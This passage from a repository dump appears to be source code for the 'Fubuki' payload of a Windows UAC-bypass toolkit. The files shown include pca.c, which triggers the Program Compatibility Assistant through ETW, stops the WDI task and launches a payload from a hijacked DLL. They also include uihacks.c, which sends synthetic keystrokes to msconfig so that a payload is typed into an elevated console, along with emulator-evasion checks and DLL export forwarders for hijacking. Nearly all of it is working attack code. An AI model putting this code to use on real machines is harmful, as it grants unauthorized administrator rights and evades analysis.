DummyFunc\nGdiplusStartup              = DummyFunc\n\n; WDI\nWdiDiagnosticModuleMain     = WdiStubGeneric\nWdiHandleInstance           = WdiStubGeneric\n\nWdiGetDiagnosticModuleInterfaceVersion\n\n; Rest of exports\nMpManagerDisable            = DummyFunc\nMpManagerEnable             = DummyFunc\nMpManagerVersionQuery       = DummyFunc \nMpMemoryScanStart           = 
DummyFunc\nMpGetEngineVersion          = DummyFunc\n\n; ISCSIEXE.DLL\n\nSvchostPushServiceGlobals       = DummyFunc\nDiscpEstablishServiceLinkage    = DummyFunc\nServiceMain                     = DummyFunc\n"
  },
  {
    "path": "Source/Fubuki/fubuki.h",
    "content": "/*******************************************************************************\n*\n*  (C) COPYRIGHT AUTHORS, 2018 - 2023\n*\n*  TITLE:       FUBUKI.H\n*\n*  VERSION:     3.64\n*\n*  DATE:        04 Feb 2023\n*\n*  Fubuki global include header file.\n*\n* THIS CODE AND INFORMATION IS PROVIDED \"AS IS\" WITHOUT WARRANTY OF\n* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED\n* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n*******************************************************************************/\n#pragma once\n\n#if !defined UNICODE\n#error ANSI build is not supported\n#endif\n\n#include \"shared\\shared.h\"\n#include \"shared\\libinc.h\"\n#include \"shared\\cmdline.h\"\n\n#include \"uihacks.h\"\n#include \"pca.h\"\n\n//\n// Forwards\n//\n#include \"winmm.h\"\n#include \"atldll.h\"\n\n#define LoadedMsg      TEXT(\"Fubuki lock and loaded\")\n\n//default execution flow\n#define AKAGI_FLAG_KILO  1\n\n//suppress all additional output\n#define AKAGI_FLAG_TANGO 2\n\nextern UACME_PARAM_BLOCK g_SharedParams;\n"
  },
  {
    "path": "Source/Fubuki/pca.c",
    "content": "/*******************************************************************************\n*\n*  (C) COPYRIGHT AUTHORS, 2021 - 2025\n*\n*  TITLE:       PCA.C\n*\n*  VERSION:     3.69\n*\n*  DATE:        07 July 2025\n* \n*  Fubuki Program Compatibility Assistant method support code.\n*\n* THIS CODE AND INFORMATION IS PROVIDED \"AS IS\" WITHOUT WARRANTY OF\n* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED\n* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n*******************************************************************************/\n\n#include \"fubuki.h\"\n#include <evntprov.h>\n#include <taskschd.h>\n#include <intrin.h>\n\n#pragma comment(lib, \"taskschd.lib\")\n\nconst ULONGLONG ZERO_VALUE = 0;\n\n/*\n* WdiGetDiagnosticModuleInterfaceVersion\n*\n* Purpose:\n*\n* Stub for fake WDI exports.\n*\n*/\nULONG_PTR WINAPI WdiGetDiagnosticModuleInterfaceVersion(\n    VOID\n)\n{\n    return 1;\n}\n\n/*\n* WdiStubGeneric\n*\n* Purpose:\n*\n* Stub for fake WDI exports.\n*\n*/\nHRESULT WINAPI WdiStubGeneric(\n    ULONG_PTR UnusedParam1,\n    ULONG_PTR UnusedParam2\n)\n{\n    UNREFERENCED_PARAMETER(UnusedParam1);\n    UNREFERENCED_PARAMETER(UnusedParam2);\n\n    return S_OK;\n}\n\n/*\n* ucmxStopTaskByName\n*\n* Purpose:\n*\n* Stop scheduled task by name.\n*\n*/\nBOOL ucmxStopTaskByName(\n    _In_ LPCWSTR TaskFolder,\n    _In_ LPCWSTR TaskName\n)\n{\n    BOOL bResult = FALSE;\n    HRESULT hr;\n    ITaskService* pService = NULL;\n    ITaskFolder* pRootFolder = NULL;\n    IRegisteredTask* pTask = NULL;\n    TASK_STATE taskState;\n\n    BSTR bstrTaskFolder = NULL;\n    BSTR bstrTask = NULL;\n    VARIANT varDummy;\n\n    do {\n\n        bstrTaskFolder = SysAllocString(TaskFolder);\n        if (bstrTaskFolder == NULL)\n            break;\n\n        bstrTask = SysAllocString(TaskName);\n        if (bstrTask == NULL)\n            break;\n\n        hr = CoCreateInstance(&CLSID_TaskScheduler,\n            NULL,\n    
        CLSCTX_INPROC_SERVER,\n            &IID_ITaskService,\n            (void**)&pService);\n\n        if (FAILED(hr))\n            break;\n\n        VariantInit(&varDummy);\n\n        hr = pService->lpVtbl->Connect(pService,\n            varDummy,\n            varDummy,\n            varDummy,\n            varDummy);\n\n        if (FAILED(hr))\n            break;\n\n        hr = pService->lpVtbl->GetFolder(pService, bstrTaskFolder, &pRootFolder);\n        if (FAILED(hr))\n            break;\n\n        hr = pRootFolder->lpVtbl->GetTask(pRootFolder, bstrTask, &pTask);\n        if (FAILED(hr))\n            break;\n\n        hr = pTask->lpVtbl->get_State(pTask, &taskState);\n        if (FAILED(hr))\n            break;\n\n        if (taskState == TASK_STATE_RUNNING) {\n            hr = pTask->lpVtbl->Stop(pTask, 0);\n        }\n\n        bResult = SUCCEEDED(hr);\n\n    } while (FALSE);\n\n    if (bstrTaskFolder)\n        SysFreeString(bstrTaskFolder);\n\n    if (bstrTask)\n        SysFreeString(bstrTask);\n\n    if (pTask)\n        pTask->lpVtbl->Release(pTask);\n\n    if (pRootFolder)\n        pRootFolder->lpVtbl->Release(pRootFolder);\n\n    if (pService)\n        pService->lpVtbl->Release(pService);\n\n    return bResult;\n}\n\n/*\n* pcaEtwCall\n*\n* Purpose:\n*\n* Write ETW events to trigger the PCA process.\n*\n*/\nULONG pcaEtwCall()\n{\n    CONST GUID providerGuid = { 0x0EEF54E71, 0x661, 0x422D, {0x9A, 0x98, 0x82, 0xFD, 0x49, 0x40, 0xB8, 0x20} };\n    CONST EVENT_DATA_DESCRIPTOR eventUserData[3] = {\n        {(UINT_PTR)&ZERO_VALUE, sizeof(ULONG)},\n        {(UINT_PTR)&ZERO_VALUE, sizeof(ULONG)},\n        {(UINT_PTR)NULL, 0}\n    };\n\n    EVENT_DESCRIPTOR eventDescriptor;\n    ULONG status = 0;\n\n    eventDescriptor.Id = 0x1F46;\n    eventDescriptor.Version = 0;\n    eventDescriptor.Channel = 0x11;\n    eventDescriptor.Level = 4;\n    eventDescriptor.Opcode = 0;\n    eventDescriptor.Task = 0;\n    eventDescriptor.Keyword = 0x4000000000000100;\n\n    status = 
EtwEventWriteNoRegistration(\n        &providerGuid,\n        &eventDescriptor,\n        3,\n        (PEVENT_DATA_DESCRIPTOR)&eventUserData);\n\n    if (status == ERROR_SUCCESS) {\n\n        eventDescriptor.Id = 0x1F48;\n\n        status = EtwEventWriteNoRegistration(\n            &providerGuid,\n            &eventDescriptor,\n            3,\n            (PEVENT_DATA_DESCRIPTOR)&eventUserData);\n\n    }\n\n    return status;\n}\n\n/*\n* pcaStopWDI\n*\n* Purpose:\n*\n* Stop WDI task and exit loader.\n*\n*/\nULONG pcaStopWDI()\n{\n    HRESULT hr;\n    NTSTATUS ntStatus = STATUS_UNSUCCESSFUL;\n\n    ucmDbgMsg(L\"[PCALDR] pcaStopWDI\\r\\n\");\n\n    hr = CoInitializeEx(NULL,\n        COINIT_APARTMENTTHREADED |\n        COINIT_DISABLE_OLE1DDE |\n        COINIT_SPEED_OVER_MEMORY);\n\n    if (SUCCEEDED(hr)) {\n\n        ucmSleep(1000);\n\n        if (ucmxStopTaskByName(\n            TEXT(\"Microsoft\\\\Windows\\\\WDI\"),\n            TEXT(\"ResolutionHost\")))\n        {\n            ucmDbgMsg(L\"[PCALDR] ucmxStopTaskByName success\\r\\n\");\n            ntStatus = STATUS_SUCCESS;\n        }\n\n        CoUninitialize();\n\n    }\n\n    return ntStatus;\n}\n\n/*\n* pcaWin7Trigger\n*\n* Purpose:\n*\n* PCA Windows 7 specific trigger method.\n*\n*/\nULONG pcaWin7Trigger(\n    VOID\n)\n{\n    ucmSleep(2000);\n    return 0;\n}\n\n/*\n* pcaEntryPointLoader\n*\n* Purpose:\n*\n* Entry point to be used in exe mode with PCA method ONLY.\n*\n*/\nVOID WINAPI pcaEntryPointLoader(\n    VOID)\n{\n    ULONG rLen = 0, status = 0;\n    LPCWSTR lpCmdline = GetCommandLine();\n    WCHAR szLoaderParam[MAX_PATH + 1];\n\n    if (wdIsEmulatorPresent() != STATUS_NOT_SUPPORTED) {\n        RtlExitUserProcess('foff');\n    }\n\n    RtlSecureZeroMemory(szLoaderParam, sizeof(szLoaderParam));\n    GetCommandLineParam(lpCmdline, 0, (LPWSTR)&szLoaderParam, MAX_PATH, &rLen);\n\n    if (rLen) {\n\n        if (szLoaderParam[0] == TEXT('1')) {\n            status = pcaEtwCall();\n        }\n        else if 
(szLoaderParam[0] == TEXT('2')) {\n            status = pcaStopWDI();\n        } else if(szLoaderParam[0] == TEXT('3')) {\n            status = pcaWin7Trigger();\n        }\n    }\n    else {\n        ucmDbgMsg(L\"[PCALDR] Empty command line\\r\\n\");\n    }\n\n    RtlExitUserProcess(status);\n}\n\n/*\n* pcaEntryPointDll\n*\n* Purpose:\n*\n* Entry point to be used in dll mode with PCA method ONLY.\n*\n*/\nBOOL WINAPI pcaEntryPointDll(\n    _In_ HINSTANCE hinstDLL,\n    _In_ DWORD fdwReason,\n    _In_ LPVOID lpvReserved\n)\n{\n    BOOL bSharedParamsReadOk;\n    PWSTR lpParameter;\n    ULONG cbParameter;\n\n    HANDLE hSharedSection = NULL;\n    PCA_LOADER_BLOCK* pvLoaderBlock = NULL;\n\n    NTSTATUS ntStatus;\n\n    SIZE_T viewSize = PAGE_SIZE;\n\n    HANDLE hSharedEvent = NULL;\n    WCHAR szObjectName[MAX_PATH];\n    WCHAR szName[128];\n    WCHAR szLoaderCmdLine[2];\n    WCHAR szLoader[MAX_PATH + 1];\n\n    UNICODE_STRING usName;\n    OBJECT_ATTRIBUTES obja;\n\n    PROCESS_INFORMATION processInfo;\n    STARTUPINFO startupInfo;\n\n    UNREFERENCED_PARAMETER(lpvReserved);\n\n    if (wdIsEmulatorPresent() != STATUS_NOT_SUPPORTED) {\n        RtlExitUserProcess('f0ff');\n    }\n\n    if (fdwReason == DLL_PROCESS_ATTACH) {\n\n        LdrDisableThreadCalloutsForDll(hinstDLL);\n\n        ucmDbgMsg(L\"[PCADLL] Entry\\r\\n\");\n\n        RtlSecureZeroMemory(&szName, sizeof(szName));\n        ucmGenerateSharedObjectName(FUBUKI_PCA_SECTION_ID, szName);\n\n        _strcpy(szObjectName, TEXT(\"\\\\Sessions\\\\\"));\n        ultostr(NtCurrentPeb()->SessionId, _strend(szObjectName));\n        _strcat(szObjectName, TEXT(\"\\\\BaseNamedObjects\\\\\"));\n        _strcat(szObjectName, szName);\n\n        RtlInitUnicodeString(&usName, szObjectName);\n        InitializeObjectAttributes(&obja, &usName, OBJ_CASE_INSENSITIVE, NULL, NULL);\n\n        if (NT_SUCCESS(NtOpenSection(&hSharedSection,\n            SECTION_ALL_ACCESS,\n            &obja)))\n        {\n            ntStatus = 
NtMapViewOfSection(\n                hSharedSection,\n                NtCurrentProcess(),\n                &pvLoaderBlock,\n                0,\n                PAGE_SIZE,\n                NULL,\n                &viewSize,\n                ViewUnmap,\n                MEM_TOP_DOWN,\n                PAGE_READWRITE);\n\n            if (NT_SUCCESS(ntStatus) && pvLoaderBlock && viewSize >= sizeof(PCA_LOADER_BLOCK)) {\n\n                RtlSecureZeroMemory(&szLoader, sizeof(szLoader));\n                _strncpy(szLoader, MAX_PATH, pvLoaderBlock->szLoader, MAX_PATH);\n\n                ucmDbgMsg(L\"[PCADLL] NtMapViewOfSection success\\r\\n\");\n\n                RtlSecureZeroMemory(&szName, sizeof(szName));\n                _strcpy(szObjectName, L\"\\\\BaseNamedObjects\\\\\");\n                ucmGenerateSharedObjectName(FUBUKI_PCA_EVENT_ID, szName);\n                _strcat(szObjectName, szName);\n\n                RtlInitUnicodeString(&usName, szObjectName);\n                InitializeObjectAttributes(&obja, &usName, OBJ_CASE_INSENSITIVE, NULL, NULL);\n\n                if (NT_SUCCESS(NtOpenEvent(&hSharedEvent, EVENT_MODIFY_STATE, &obja))) {\n\n                    //\n                    // Read shared params block.\n                    //\n                    RtlSecureZeroMemory(&g_SharedParams, sizeof(g_SharedParams));\n                    bSharedParamsReadOk = ucmReadSharedParameters(&g_SharedParams);\n                    if (bSharedParamsReadOk) {\n                        ucmDbgMsg(L\"[PCADLL] Shared parameters read OK\\r\\n\");\n                        lpParameter = g_SharedParams.szParameter;\n                        cbParameter = (ULONG)(_strlen(g_SharedParams.szParameter) * sizeof(WCHAR));\n                    }\n                    else {\n                        ucmDbgMsg(L\"[PCADLL] Shared parameters defaulted\\r\\n\");\n                        lpParameter = NULL;\n                        cbParameter = 0UL;\n                    }\n\n                    //\n    
                // Reset windir environment variable.\n                    //\n                    ucmSetEnvironmentVariable(T_WINDIR, USER_SHARED_DATA->NtSystemRoot);\n\n                    //\n                    // Run payload.\n                    //\n                    if (ucmLaunchPayload(lpParameter, cbParameter)) {\n                        ucmDbgMsg(L\"[PCADLL] Payload executed OK\\r\\n\");\n                        pvLoaderBlock->OpResult = FUBUKI_PCA_PAYLOAD_RUN;\n                    }\n                    else {\n                        ucmDbgMsg(L\"[PCADLL] Error during payload execution\\r\\n\");\n                    }\n\n                    //\n                    // Restart loader with \"2\" param.\n                    //\n                    RtlSecureZeroMemory(&startupInfo, sizeof(startupInfo));\n\n                    startupInfo.cb = sizeof(startupInfo);\n\n                    //\n                    // Set loader command line.\n                    //\n                    szLoaderCmdLine[0] = TEXT('2');\n                    szLoaderCmdLine[1] = 0;\n\n                    if (CreateProcess(\n                        szLoader,\n                        szLoaderCmdLine,\n                        NULL,\n                        NULL,\n                        FALSE,\n                        CREATE_NO_WINDOW,\n                        NULL,\n                        NULL,\n                        &startupInfo,\n                        &processInfo))\n                    {\n                        ucmDbgMsg(L\"[PCADLL] Loader run OK\\r\\n\");\n\n                        CloseHandle(processInfo.hThread);\n                        CloseHandle(processInfo.hProcess);\n                        pvLoaderBlock->OpResult |= FUBUKI_PCA_LOADER_RUN;\n                    }\n                    else {\n                        ucmDbgMsg(L\"[PCADLL] Error during loader execution\\r\\n\");\n                    }\n\n                    NtSetEvent(hSharedEvent, NULL);\n              
      NtClose(hSharedEvent);\n                    ucmDbgMsg(L\"[PCADLL] Shared event signaled\\r\\n\");\n\n                    //\n                    // Notify Akagi.\n                    //\n                    if (bSharedParamsReadOk) {\n                        ucmSetCompletion(g_SharedParams.szSignalObject);\n                    }\n\n                }\n                else {\n                    ucmDbgMsg(L\"[PCADLL] NtOpenEvent failed\\r\\n\");\n                }\n\n                NtUnmapViewOfSection(NtCurrentProcess(), pvLoaderBlock);\n\n            }\n            else {\n                ucmDbgMsg(L\"[PCADLL] MapViewOfFile failed\\r\\n\");\n            }\n\n            NtClose(hSharedSection);\n\n        }\n        else {\n            ucmDbgMsg(L\"[PCADLL] OpenFileMapping failed\\r\\n\");\n        }\n\n    }\n\n    return TRUE;\n}\n"
  },
  {
    "path": "Source/Fubuki/pca.h",
    "content": "/*******************************************************************************\n*\n*  (C) COPYRIGHT AUTHORS, 2021\n*\n*  TITLE:       PCA.H\n*\n*  VERSION:     3.56\n*\n*  DATE:        19 July 2021\n*\n*  Fubuki Program Compatibility Assistant related code header file.\n*\n* THIS CODE AND INFORMATION IS PROVIDED \"AS IS\" WITHOUT WARRANTY OF\n* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED\n* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n*******************************************************************************/\n#pragma once\n\ntypedef struct _PCA_LOADER_BLOCK {\n    ULONG OpResult;\n    WCHAR szLoader[MAX_PATH + 1];\n} PCA_LOADER_BLOCK, * PPCA_LOADER_BLOCK;\n"
  },
  {
    "path": "Source/Fubuki/resource.h",
    "content": "//{{NO_DEPENDENCIES}}\n// Microsoft Visual C++ generated include file.\n// Used by version.rc\n//\n\n// Next default values for new objects\n// \n#ifdef APSTUDIO_INVOKED\n#ifndef APSTUDIO_READONLY_SYMBOLS\n#define _APS_NEXT_RESOURCE_VALUE        103\n#define _APS_NEXT_COMMAND_VALUE         40001\n#define _APS_NEXT_CONTROL_VALUE         1001\n#define _APS_NEXT_SYMED_VALUE           101\n#endif\n#endif\n"
  },
  {
    "path": "Source/Fubuki/uihacks.c",
    "content": "/*******************************************************************************\n*\n*  (C) COPYRIGHT AUTHORS, 2019 - 2025\n*\n*  TITLE:       UIHACKS.C\n*\n*  VERSION:     3.69\n*\n*  DATE:        07 Jul 2025\n*\n* THIS CODE AND INFORMATION IS PROVIDED \"AS IS\" WITHOUT WARRANTY OF\n* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED\n* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n*******************************************************************************/\n\n#include \"fubuki.h\"\n\n//#define FUBUKI_TRACE_CALL\n\n#ifdef FUBUKI_TRACE_CALL\nVOID ucmxSendInput(\n    _In_ UINT cInputs,                  \n    _In_reads_(cInputs) LPINPUT pInputs,\n    _In_ int cbSize)\n{\n    WCHAR szOut[200];\n    UINT r = SendInput(cInputs, pInputs, cbSize);\n\n    _strcpy(szOut, L\"SendInput = \");\n    ultostr(r, _strend(szOut));\n    _strcat(szOut, L\" GetLastError = \");\n    ultostr(GetLastError(), _strend(szOut));\n    _strcat(szOut, L\"\\r\\n\");\n    OutputDebugString(szOut);\n}\n#else\n#define ucmxSendInput SendInput\n#endif\n\n/*\n* ucmxSendControlInput\n*\n* Purpose:\n*\n* Send keyboard input to the foreground window with optional shift key.\n*\n*/\nVOID ucmxSendControlInput(\n    _In_ WORD VkKey,\n    _In_ BOOL UseShift)\n{\n    INPUT ip;\n\n    ip.type = INPUT_KEYBOARD;\n    ip.ki.wScan = 0;\n    ip.ki.time = 0;\n    ip.ki.dwExtraInfo = 0;\n    ip.ki.dwFlags = 0;\n\n    if (UseShift) {\n        ip.ki.wVk = VK_LSHIFT;\n        ucmxSendInput(1, &ip, sizeof(INPUT));\n    }\n\n    ip.ki.wVk = VkKey;\n    ucmxSendInput(1, &ip, sizeof(INPUT));\n\n    ip.ki.dwFlags = KEYEVENTF_KEYUP;\n    ucmxSendInput(1, &ip, sizeof(INPUT));\n\n    if (UseShift) {\n        ip.ki.wVk = VK_LSHIFT;\n        ip.ki.dwFlags = KEYEVENTF_KEYUP;\n        ucmxSendInput(1, &ip, sizeof(INPUT));\n    }\n}\n\n/*\n* ucmxSendKeys\n*\n* Purpose:\n*\n* Send a sequence of keystrokes to the foreground window.\n*\n*/\nVOID 
ucmxSendKeys(\n    _In_ LPWSTR lpString)\n{\n    BOOL NeedShift;\n    SIZE_T i;\n    WORD VkAndShift;\n\n    HKL kl = LoadKeyboardLayout(TEXT(\"en-US\"), KLF_ACTIVATE);\n\n    for (i = 0; i < _strlen(lpString); i++) {\n        VkAndShift = VkKeyScanEx(lpString[i], kl);\n        NeedShift = ((HIBYTE(VkAndShift) & 1) == 1);\n        ucmxSendControlInput(LOBYTE(VkAndShift), NeedShift);\n    }\n}\n\n/*\n* ucmxElevatedConsoleCallback\n*\n* Purpose:\n*\n* Callback used to locate window of elevated console.\n*\n*/\nBOOL CALLBACK ucmxElevatedConsoleCallback(\n    _In_ HWND   hwnd,\n    _In_ LPARAM lParam\n)\n{\n    BOOL Elevated = FALSE;\n    DWORD dwPid;\n    LPWSTR lpPayload = (LPWSTR)lParam;\n    WCHAR szBuffer[MAX_PATH + 1];\n\n    if (GetClassName(hwnd, (LPWSTR)szBuffer, MAX_PATH)) {\n        if (_strcmpi(szBuffer, TEXT(\"ConsoleWindowClass\")) == 0) {\n            if (GetWindowThreadProcessId(hwnd, &dwPid)) {\n                if (NT_SUCCESS(ucmIsProcessElevated(dwPid, &Elevated))) {\n                    if (Elevated) {\n                        ucmxSendKeys(lpPayload);\n                        ucmxSendControlInput(VK_RETURN, FALSE);\n                        return TRUE;\n                    }\n                }\n            }\n        }\n    }\n\n    return FALSE;\n}\n\n/*\n* ucmxEnumChildCallback\n*\n* Purpose:\n*\n* EnumChildWindows callback used to send keys to msconfig and cmd.\n*\n*/\nBOOL CALLBACK ucmxEnumChildCallback(\n    _In_ HWND   hwnd,\n    _In_ LPARAM lParam\n)\n{\n    UINT i;\n    HWND hwndButton, hwndList;\n\n    //\n    // Find msconfig tools listview.\n    //\n    hwndList = FindWindowEx(hwnd, NULL, TEXT(\"SysListView32\"), TEXT(\"List1\"));\n    if (hwndList) {\n\n        //SetFocus(hwndList);\n\n        //\n        // Navigate to cmd.exe entry in msconfig listview.\n        //\n        for (i = 0; i < 14; i++) {\n            ucmxSendControlInput(VK_DOWN, FALSE);\n        }\n\n        hwndButton = GetDlgItem(hwnd, 302);\n        if (hwndButton == 
NULL)\n            hwndButton = GetDlgItem(hwnd, 1117);\n\n        if (hwndButton) {\n\n            //\n            // Navigate to \"Launch\" button.\n            //\n            ucmxSendControlInput(VK_TAB, FALSE);\n            ucmxSendControlInput(VK_TAB, FALSE);\n\n            //\n            // Press \"Launch\" button.\n            //\n            ucmxSendControlInput(VK_RETURN, FALSE);\n            Sleep(1000);\n            //\n            // Send input to elevated console.\n            //\n            ucmxElevatedConsoleCallback(GetForegroundWindow(), lParam);\n\n            return FALSE;\n        }\n#ifdef FUBUKI_TRACE_CALL\n        else {\n            OutputDebugString(L\"GetDlgItem(BUTTON) failed\\r\\n\");\n        }\n#endif\n    }\n\n    return TRUE;\n}\n\n/*\n* ucmxFindMainMsConfigWindow\n*\n* Purpose:\n*\n* EnumWindows callback used to locate msconfig dialog window.\n*\n*/\nBOOL CALLBACK ucmxFindMainMsConfigWindow(\n    _In_ HWND   hwnd,\n    _In_ LPARAM lParam\n)\n{\n    PSEARCH_WND SearchWnd = (PSEARCH_WND)lParam;\n\n    WCHAR szClassName[MAX_PATH * 2];\n\n    DWORD dwPid;\n    DWORD dwTargetPid = SearchWnd->ProcessId;\n\n    GetWindowThreadProcessId(hwnd, &dwPid);\n    if (dwPid == dwTargetPid) {\n\n        if (GetClassName(hwnd, szClassName, MAX_PATH)) {\n\n            if (_strcmpi(szClassName, TEXT(\"#32770\")) == 0) {\n                SearchWnd->hWnd = hwnd;\n                return FALSE;\n            }\n        }\n    }\n\n    return TRUE;\n}\n\n/*\n* ucmxGetHwndForMsConfig\n*\n* Purpose:\n*\n* Return dialog hwnd of msconfig.\n*\n*/\nHWND ucmxGetHwndForMsConfig(\n    _In_ ULONG ProcessId\n)\n{\n    SEARCH_WND SearchWnd;\n\n    SearchWnd.ProcessId = ProcessId;\n    SearchWnd.hWnd = NULL;\n    if (!EnumWindows(ucmxFindMainMsConfigWindow, (LPARAM)&SearchWnd)) {\n        return SearchWnd.hWnd;\n    }\n    return NULL;\n}\n\n/*\n* ucmUIHackExecute\n*\n* Purpose:\n*\n* Force msconfig to spawn elevated cmd copy via gui-hack and gui-hack it 
too.\n*\n*/\nVOID ucmUIHackExecute(\n    _In_ LPWSTR lpPayload\n)\n{\n    HWND hwndDlg;\n    SHELLEXECUTEINFO shinfo;\n    PROCESS_BASIC_INFORMATION pbi;\n    WCHAR szBuffer[MAX_PATH * 2];\n\n    _strcpy(szBuffer, USER_SHARED_DATA->NtSystemRoot);\n    _strcat(szBuffer, SYSTEM32_DIR);\n    _strcat(szBuffer, MSCONFIG_EXE);\n\n    RtlSecureZeroMemory(&shinfo, sizeof(shinfo));\n    shinfo.cbSize = sizeof(shinfo);\n    shinfo.fMask = SEE_MASK_NOCLOSEPROCESS;\n    shinfo.lpFile = szBuffer;\n    shinfo.lpParameters = TEXT(\"-5\");\n    shinfo.nShow = SW_SHOW;\n    if (ShellExecuteEx(&shinfo)) {\n\n        RtlSecureZeroMemory(&pbi, sizeof(PROCESS_BASIC_INFORMATION));\n        if (NT_SUCCESS(NtQueryInformationProcess(shinfo.hProcess,\n            ProcessBasicInformation,\n            (PVOID)&pbi,\n            sizeof(PROCESS_BASIC_INFORMATION),\n            NULL)))\n        {\n            Sleep(1000);\n            hwndDlg = ucmxGetHwndForMsConfig((ULONG)pbi.UniqueProcessId);\n            if (hwndDlg) {\n                EnumChildWindows(hwndDlg, ucmxEnumChildCallback, (LPARAM)lpPayload);\n            }\n        }\n\n        TerminateProcess(shinfo.hProcess, 0);\n        CloseHandle(shinfo.hProcess);\n    }\n}\n\n/*\n* ucmUIHackExecute2\n*\n* Purpose:\n*\n* GUI hack target program via sending F1 key.\n*\n*/\nVOID ucmUIHackExecute2(\n    VOID\n)\n{\n    INPUT ip;\n    ULONG iRetry = 5;\n    SHELLEXECUTEINFO shinfo;\n    WCHAR szBuffer[MAX_PATH * 2];\n\n    HWND hwnd;\n\n    _strcpy(szBuffer, USER_SHARED_DATA->NtSystemRoot);\n    _strcat(szBuffer, SYSTEM32_DIR);\n    _strcat(szBuffer, MMC_EXE);\n\n    RtlSecureZeroMemory(&shinfo, sizeof(shinfo));\n    shinfo.cbSize = sizeof(shinfo);\n    shinfo.fMask = SEE_MASK_NOCLOSEPROCESS;\n    shinfo.lpFile = szBuffer;\n    shinfo.lpParameters = EVENTVWR_MSC;\n    shinfo.nShow = SW_SHOW;\n    if (ShellExecuteEx(&shinfo)) {\n\n        do {\n            hwnd = FindWindow(L\"MMCMainFrame\", NULL);\n            if (hwnd)\n                
break;\n            else {\n                Sleep(1000);\n            }\n        } while (--iRetry);\n\n        if (hwnd) {\n\n            SetForegroundWindow(hwnd);\n\n            ip.type = INPUT_KEYBOARD;\n            ip.ki.wScan = 0;\n            ip.ki.time = 0;\n            ip.ki.dwExtraInfo = 0;\n            ip.ki.dwFlags = 0;\n\n            ip.ki.wVk = VK_F1;\n            ucmxSendInput(1, &ip, sizeof(INPUT));\n            Sleep(1000);\n        }\n        else {\n            ucmDbgMsg(L\"MMCMainFrame window not found\\r\\n\");\n        }\n\n        TerminateProcess(shinfo.hProcess, 0);\n        CloseHandle(shinfo.hProcess);\n    }\n}\n"
  },
  {
    "path": "Source/Fubuki/uihacks.h",
    "content": "/*******************************************************************************\n*\n*  (C) COPYRIGHT AUTHORS, 2019 - 2024\n*\n*  TITLE:       UIHACKS.H\n*\n*  VERSION:     3.66\n*\n*  DATE:        03 Apr 2024\n*\n*  Fubuki UIAccess related code header file.\n*\n* THIS CODE AND INFORMATION IS PROVIDED \"AS IS\" WITHOUT WARRANTY OF\n* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED\n* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n*******************************************************************************/\n#pragma once\n\ntypedef struct _SEARCH_WND {\n    HWND hWnd;\n    ULONG ProcessId;\n} SEARCH_WND, *PSEARCH_WND;\n\nVOID ucmUIHackExecute(\n    _In_ LPWSTR lpPayload);\n\nVOID ucmUIHackExecute2(\n    VOID);\n"
  },
  {
    "path": "Source/Fubuki/winmm.h",
    "content": "/*******************************************************************************\n*\n*  (C) COPYRIGHT AUTHORS, 2018\n*\n*  TITLE:       WINMM.H\n*\n*  VERSION:     3.04\n*\n*  DATE:        10 Nov 2018\n*\n*  WINMM forwarded import.\n*\n* THIS CODE AND INFORMATION IS PROVIDED \"AS IS\" WITHOUT WARRANTY OF\n* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED\n* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n*******************************************************************************/\n\n#pragma once\n\n#pragma comment(linker, \" /EXPORT:timeBeginPeriod=\\\\\\\\?\\\\globalroot\\\\systemroot\\\\system32\\\\winmm.timeBeginPeriod\")\n#pragma comment(linker, \" /EXPORT:timeEndPeriod=\\\\\\\\?\\\\globalroot\\\\systemroot\\\\system32\\\\winmm.timeEndPeriod\")\n#pragma comment(linker, \" /EXPORT:waveOutGetNumDevs=\\\\\\\\?\\\\globalroot\\\\systemroot\\\\system32\\\\winmm.waveOutGetNumDevs\")\n#pragma comment(linker, \" /EXPORT:midiInMessage=\\\\\\\\?\\\\globalroot\\\\systemroot\\\\system32\\\\winmm.midiInMessage\")\n#pragma comment(linker, \" /EXPORT:midiOutGetErrorTextW=\\\\\\\\?\\\\globalroot\\\\systemroot\\\\system32\\\\winmm.midiOutGetErrorTextW\")\n#pragma comment(linker, \" /EXPORT:midiOutGetNumDevs=\\\\\\\\?\\\\globalroot\\\\systemroot\\\\system32\\\\winmm.midiOutGetNumDevs\")\n#pragma comment(linker, \" /EXPORT:midiOutMessage=\\\\\\\\?\\\\globalroot\\\\systemroot\\\\system32\\\\winmm.midiOutMessage\")\n#pragma comment(linker, \" /EXPORT:midiOutPrepareHeader=\\\\\\\\?\\\\globalroot\\\\systemroot\\\\system32\\\\winmm.midiOutPrepareHeader\")\n#pragma comment(linker, \" /EXPORT:midiOutReset=\\\\\\\\?\\\\globalroot\\\\systemroot\\\\system32\\\\winmm.midiOutReset\")\n#pragma comment(linker, \" /EXPORT:midiOutUnprepareHeader=\\\\\\\\?\\\\globalroot\\\\systemroot\\\\system32\\\\winmm.midiOutUnprepareHeader\")\n#pragma comment(linker, \" 
